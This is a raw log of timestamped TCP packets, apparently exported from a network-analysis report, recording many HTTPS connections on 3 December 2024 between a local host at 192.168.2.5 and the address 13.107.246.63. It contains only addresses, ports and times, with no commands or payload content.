                                Dec 3, 2024 17:51:34.770490885 CET50029443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.770540953 CET4435002913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.772365093 CET50028443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.772381067 CET4435002813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.772622108 CET50029443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.772856951 CET50029443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.772880077 CET4435002913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.024856091 CET4435002513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.117263079 CET50025443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.117280006 CET4435002513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.117810965 CET50025443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.117816925 CET4435002513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.161858082 CET4435002613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.210084915 CET50026443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.210120916 CET4435002613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.210833073 CET50026443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.210850000 CET4435002613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.469739914 CET4435002513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.469815016 CET4435002513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.481496096 CET50025443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.561193943 CET50025443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.561193943 CET50025443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.561218023 CET4435002513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.561228991 CET4435002513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.577945948 CET50030443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.577984095 CET4435003013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.582062960 CET50030443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.619931936 CET4435002613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.619990110 CET4435002613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.622500896 CET50026443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.628974915 CET50030443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.629004955 CET4435003013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.629276991 CET50026443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.629296064 CET4435002613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.629307985 CET50026443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.629314899 CET4435002613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.635765076 CET50031443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.635843992 CET4435003113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:35.635993004 CET50031443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.636251926 CET50031443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:35.636271954 CET4435003113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.230324984 CET4435002713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.239923000 CET50027443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.239936113 CET4435002713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.240456104 CET50027443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.240461111 CET4435002713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.554466963 CET4435002813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.555118084 CET50028443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.555151939 CET4435002813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.555635929 CET50028443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.555644989 CET4435002813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.602576017 CET4435002913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.603245974 CET50029443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.603269100 CET4435002913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.603775024 CET50029443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.603782892 CET4435002913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.673224926 CET4435002713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.673309088 CET4435002713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.673422098 CET50027443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.673616886 CET50027443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.673616886 CET50027443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.673635006 CET4435002713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.673648119 CET4435002713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.676970005 CET50033443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.677015066 CET4435003313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.677103043 CET50033443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.677314997 CET50033443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.677326918 CET4435003313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.997258902 CET4435002813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.997318029 CET4435002813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.997575998 CET50028443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.997625113 CET50028443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.997641087 CET4435002813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:36.997657061 CET50028443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:36.997661114 CET4435002813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.000926018 CET50034443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:37.000963926 CET4435003413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.001094103 CET50034443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:37.005033016 CET50034443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:37.005048990 CET4435003413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.052707911 CET4435002913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.052757978 CET4435002913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.058681011 CET50029443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:37.058991909 CET50029443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:37.058991909 CET50029443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:37.059015036 CET4435002913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.059024096 CET4435002913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.062015057 CET50035443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:37.062050104 CET4435003513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.062406063 CET50035443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:37.090663910 CET50035443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:37.090678930 CET4435003513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.411024094 CET4435003013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.468056917 CET50030443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:37.468086004 CET4435003013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.468554020 CET50030443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:37.468559027 CET4435003013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.539268970 CET4435003113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.577296019 CET50031443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:37.577315092 CET4435003113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.577877998 CET50031443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:37.577883959 CET4435003113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.984404087 CET4435003013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.984508991 CET4435003013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.989891052 CET50030443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:37.993055105 CET4435003113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:37.993113041 CET4435003113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:38.006951094 CET50031443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:38.075761080 CET50030443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:38.075773001 CET4435003013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:38.075784922 CET50030443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:38.075788975 CET4435003013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:38.085496902 CET50031443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:38.085519075 CET4435003113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:38.085530996 CET50031443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:38.085539103 CET4435003113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:38.275486946 CET50036443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:38.275523901 CET4435003613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:38.276065111 CET50036443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:38.300934076 CET50037443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:38.300945997 CET4435003713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:38.301646948 CET50036443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:38.301662922 CET4435003613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:38.308485031 CET50037443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:38.308746099 CET50037443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:38.308757067 CET4435003713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:38.624039888 CET4435003313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:38.718530893 CET50033443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:38.718564987 CET4435003313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:38.719067097 CET50033443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:38.719073057 CET4435003313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:38.956315041 CET4435003413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:38.991693974 CET4435003513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.039184093 CET50034443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.039225101 CET50035443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.092035055 CET4435003313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.092117071 CET4435003313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.127341032 CET4435003313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.140408993 CET50033443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.345700026 CET50034443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.345727921 CET4435003413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.346199989 CET50034443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.346206903 CET4435003413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.346657991 CET50035443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.346692085 CET4435003513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.347035885 CET50035443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.347039938 CET4435003513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.347676992 CET50033443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.347697973 CET4435003313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.347708941 CET50033443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.347713947 CET4435003313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.690351009 CET4435003513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.690423965 CET4435003513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.690485001 CET4435003413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.690553904 CET4435003413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.693113089 CET50034443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.693114996 CET50035443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.795161009 CET50038443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.795211077 CET4435003813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.795327902 CET50038443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.795532942 CET50035443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.795562983 CET4435003513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.795593977 CET50035443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.795599937 CET4435003513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.796381950 CET50034443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.796413898 CET4435003413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.796427011 CET50034443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.796433926 CET4435003413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.882683992 CET50038443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.882707119 CET4435003813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.916245937 CET50039443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:39.916306973 CET4435003913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:39.916563988 CET50039443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.091689110 CET50039443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.091702938 CET4435003913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.096834898 CET4435003613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.198048115 CET4435003713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.229576111 CET50036443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.311063051 CET50036443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.311086893 CET4435003613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.311588049 CET50036443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.311594009 CET4435003613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.330416918 CET50037443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.332906961 CET50037443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.332916021 CET4435003713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.333390951 CET50037443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.333395958 CET4435003713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.337321043 CET50040443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.337356091 CET4435004013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.339677095 CET50040443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.339937925 CET50040443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.339948893 CET4435004013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.636574030 CET4435003613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.636637926 CET4435003613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.653440952 CET50036443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.667401075 CET4435003713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.667465925 CET4435003713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.673588037 CET50037443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.712311029 CET50036443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.712331057 CET4435003613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.712341070 CET50036443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.712352037 CET4435003613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.824779034 CET50037443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.824811935 CET4435003713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:40.824827909 CET50037443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:40.824834108 CET4435003713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:41.252774954 CET50041443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:41.252814054 CET4435004113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:41.255872011 CET50042443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:41.255898952 CET4435004213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:41.256892920 CET50041443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:41.256894112 CET50042443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:41.266666889 CET50041443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:41.266680956 CET4435004113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:41.266814947 CET50042443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:41.266827106 CET4435004213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:41.794501066 CET4435003813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:41.843781948 CET50038443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:41.868237972 CET50038443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:41.868251085 CET4435003813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:41.868804932 CET50038443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:41.868809938 CET4435003813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.085282087 CET49703443192.168.2.523.1.237.91
                                Dec 3, 2024 17:51:42.103276014 CET4435003913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.104434967 CET50039443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:42.104460001 CET4435003913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.105009079 CET50039443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:42.105014086 CET4435003913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.205265999 CET4434970323.1.237.91192.168.2.5
                                Dec 3, 2024 17:51:42.229201078 CET4435003813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.229285002 CET4435003813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.247332096 CET4435003813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.247767925 CET50038443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:42.326054096 CET4435004013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.429224968 CET50040443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:42.540980101 CET4435003913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.541040897 CET4435003913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.547331095 CET4435003913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.550339937 CET50039443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:42.858141899 CET50038443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:42.858170033 CET4435003813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.858182907 CET50038443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:42.858189106 CET4435003813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.860562086 CET50040443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:42.860573053 CET4435004013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.861054897 CET50040443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:42.861057997 CET4435004013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.863195896 CET50039443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:42.863229036 CET4435003913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:42.863244057 CET50039443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:42.863250971 CET4435003913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.053317070 CET4435004213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.135210991 CET50042443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.178587914 CET50042443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.178591967 CET4435004213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.179085016 CET50042443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.179088116 CET4435004213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.204688072 CET50043443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.204726934 CET4435004313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.204999924 CET50043443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.232848883 CET4435004113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.249073029 CET50044443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.249121904 CET4435004413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.256099939 CET50044443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.257242918 CET50043443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.257261038 CET4435004313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.321729898 CET50041443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.321754932 CET4435004113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.322331905 CET50041443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.322335958 CET4435004113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.323184967 CET50044443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.323210001 CET4435004413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.337652922 CET4435004013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.337943077 CET4435004013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.338052988 CET50040443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.338574886 CET50040443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.338584900 CET4435004013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.338737965 CET50040443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.338743925 CET4435004013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.342109919 CET50045443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.342147112 CET4435004513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.342262030 CET50045443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.342603922 CET50045443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.342616081 CET4435004513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.506110907 CET4435004213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.506165028 CET4435004213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.518834114 CET50042443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.525504112 CET50042443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.525516033 CET4435004213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.525526047 CET50042443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.525531054 CET4435004213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.528753042 CET50046443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.528801918 CET4435004613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.528995037 CET50046443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.529366016 CET50046443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.529381037 CET4435004613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.700808048 CET4435004113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.700874090 CET4435004113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.720412970 CET50041443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.795489073 CET50041443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.795489073 CET50041443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.795527935 CET4435004113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.795540094 CET4435004113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.800951004 CET50047443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.800992012 CET4435004713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:43.801223993 CET50047443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.801995039 CET50047443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:43.802007914 CET4435004713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.125153065 CET4435004313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.138071060 CET4435004413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.241539955 CET50043443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.241616011 CET50044443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.353710890 CET4435004613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.369457960 CET4435004513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.423064947 CET50046443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.443231106 CET50045443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.683743000 CET4435004713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.745582104 CET50047443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.905297995 CET50047443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.905319929 CET4435004713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.905812979 CET50047443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.905818939 CET4435004713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.906218052 CET50045443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.906229019 CET4435004513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.906615973 CET50045443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.906624079 CET4435004513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.909543991 CET50043443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.909574986 CET4435004313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.909929991 CET50043443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.909935951 CET4435004313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.913306952 CET50044443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.913336039 CET4435004413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.913682938 CET50044443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.913690090 CET4435004413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.950470924 CET50046443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.950494051 CET4435004613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:45.950942993 CET50046443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:45.950948000 CET4435004613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.241393089 CET4435004713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.241460085 CET4435004713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.247488976 CET4435004313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.247574091 CET4435004313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.249845982 CET4435004413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.251620054 CET4435004513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.251687050 CET4435004513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.267333984 CET4435004713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.279334068 CET4435004513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.287329912 CET4435004313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.290234089 CET50047443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.290235043 CET50043443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.290374041 CET50045443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.310458899 CET50047443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.310646057 CET50045443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.310651064 CET50043443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.321039915 CET4435004613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.321132898 CET4435004613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.330662012 CET50044443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.330688953 CET4435004413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:46.330705881 CET50046443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.371654987 CET50047443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:46.371679068 CET4435004713.107.246.63192.168.2.5
